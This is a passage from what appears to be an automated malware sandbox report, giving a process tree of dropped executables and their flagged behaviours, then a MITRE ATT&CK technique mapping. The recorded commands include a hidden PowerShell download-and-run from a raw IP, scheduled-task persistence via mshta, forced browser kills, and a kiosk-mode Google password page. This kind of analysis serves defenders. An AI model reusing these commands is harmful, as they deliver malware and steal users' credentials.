        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2740 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:2
        6⤵
        
        PID:3248
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2864 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1748
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3320 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:8
        6⤵
        
        PID:3092
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3596 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:8
        6⤵
        
        PID:2808
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 544
      4⤵
      Program crash
      PID:3904
- - C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe
    "C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1216
  - - C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe
      "C:\Users\Admin\AppData\Local\Temp\1088721001\f3Ypd8O.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1732
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 504
      4⤵
      Program crash
      PID:1168
- - C:\Users\Admin\AppData\Local\Temp\1088722001\d2YQIJa.exe
    "C:\Users\Admin\AppData\Local\Temp\1088722001\d2YQIJa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3772
- - C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe
    "C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2512
  - - C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe
      "C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"
      4⤵
      Executes dropped EXE
      PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe
      "C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"
      4⤵
      Executes dropped EXE
      PID:776
  - - C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe
      "C:\Users\Admin\AppData\Local\Temp\1088723001\9aiiMOQ.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:696
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 520
      4⤵
      Program crash
      PID:2900
- - C:\Users\Admin\AppData\Local\Temp\1088724001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1088724001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3676
- - C:\Users\Admin\AppData\Local\Temp\1088725001\aa0be991e6.exe
    "C:\Users\Admin\AppData\Local\Temp\1088725001\aa0be991e6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3484
- - C:\Users\Admin\AppData\Local\Temp\1088726001\468c3dbc43.exe
    "C:\Users\Admin\AppData\Local\Temp\1088726001\468c3dbc43.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Checks processor information in registry
    PID:3816
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious use of AdjustPrivilegeToken
      PID:2912
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7789758,0x7fef7789768,0x7fef7789778
        5⤵
        
        PID:1984
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2340
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1284,i,13992303800108329394,6930993476889799011,131072 /prefetch:2
        5⤵
        
        PID:1692
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1284,i,13992303800108329394,6930993476889799011,131072 /prefetch:8
        5⤵
        
        PID:3692
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 --field-trial-handle=1284,i,13992303800108329394,6930993476889799011,131072 /prefetch:8
        5⤵
        
        PID:980
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2352 --field-trial-handle=1284,i,13992303800108329394,6930993476889799011,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3828
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2524 --field-trial-handle=1284,i,13992303800108329394,6930993476889799011,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3832
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2604 --field-trial-handle=1284,i,13992303800108329394,6930993476889799011,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1884
- - C:\Users\Admin\AppData\Local\Temp\1088727001\1c29bfe45e.exe
    "C:\Users\Admin\AppData\Local\Temp\1088727001\1c29bfe45e.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2352
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2116
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3096
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3292
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:3800
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3224
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3224.0.833867945\1409877751" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1156 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {da9b4bd3-401a-4f1b-8107-f933e8c99a37} 3224 "\\.\pipe\gecko-crash-server-pipe.3224" 1336 13f04d58 gpu
        6⤵
        
        PID:2408
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3224.1.844753483\1387575580" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9494ffe-e571-4f1f-b484-e48d320fd31c} 3224 "\\.\pipe\gecko-crash-server-pipe.3224" 1528 e71e58 socket
        6⤵
        
        PID:1036
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3224.2.616001436\1885182953" -childID 1 -isForBrowser -prefsHandle 2128 -prefMapHandle 2124 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4149352c-3aa3-4d50-b9d0-6708ae051e06} 3224 "\\.\pipe\gecko-crash-server-pipe.3224" 2140 1a3b2858 tab
        6⤵
        
        PID:1232
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3224.3.1137763604\1182330069" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33dd4b52-1650-4ae5-845a-24a545603c23} 3224 "\\.\pipe\gecko-crash-server-pipe.3224" 2924 1b72c858 tab
        6⤵
        
        PID:112
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3224.4.538641315\1956167921" -childID 3 -isForBrowser -prefsHandle 3760 -prefMapHandle 3772 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6bd89eff-c533-4d94-93c3-5a8cdb999a37} 3224 "\\.\pipe\gecko-crash-server-pipe.3224" 3788 20811f58 tab
        6⤵
        
        PID:3484
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3224.5.988874820\1882066504" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {987c427d-0568-4716-84f4-2f5395c359f2} 3224 "\\.\pipe\gecko-crash-server-pipe.3224" 3896 20851258 tab
        6⤵
        
        PID:2808
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3224.6.1097690450\744847931" -childID 5 -isForBrowser -prefsHandle 4024 -prefMapHandle 4028 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {633da45e-3004-4137-92a3-4acf39dbeb06} 3224 "\\.\pipe\gecko-crash-server-pipe.3224" 3780 20853f58 tab
        6⤵
        
        PID:3908
- - C:\Users\Admin\AppData\Local\Temp\1088728001\dc4867a9cf.exe
    "C:\Users\Admin\AppData\Local\Temp\1088728001\dc4867a9cf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SendNotifyMessage
    PID:3904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn LVerzmaKkmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\FebUL7Nfx.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3280
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn LVerzmaKkmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\FebUL7Nfx.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:776
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\FebUL7Nfx.hta
      4⤵
      Modifies Internet Explorer settings
      PID:2856
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3104
      - C:\Users\Admin\AppData\Local\TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE
        
        "C:\Users\Admin\AppData\Local\TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2352
- - C:\Users\Admin\AppData\Local\Temp\1088729001\92c7e4ad44.exe
    "C:\Users\Admin\AppData\Local\Temp\1088729001\92c7e4ad44.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3152
- - C:\Users\Admin\AppData\Local\Temp\1088730001\36f5f1ecb3.exe
    "C:\Users\Admin\AppData\Local\Temp\1088730001\36f5f1ecb3.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2636

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1140

C:\Windows\system32\taskeng.exe
taskeng.exe {1D5C353A-F1B7-4B5C-8CF0-764D1321C79F} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
1⤵
PID:2176
- C:\ProgramData\jwclx\mcwnj.exe
  C:\ProgramData\jwclx\mcwnj.exe start2
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2372

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1868

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3176

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion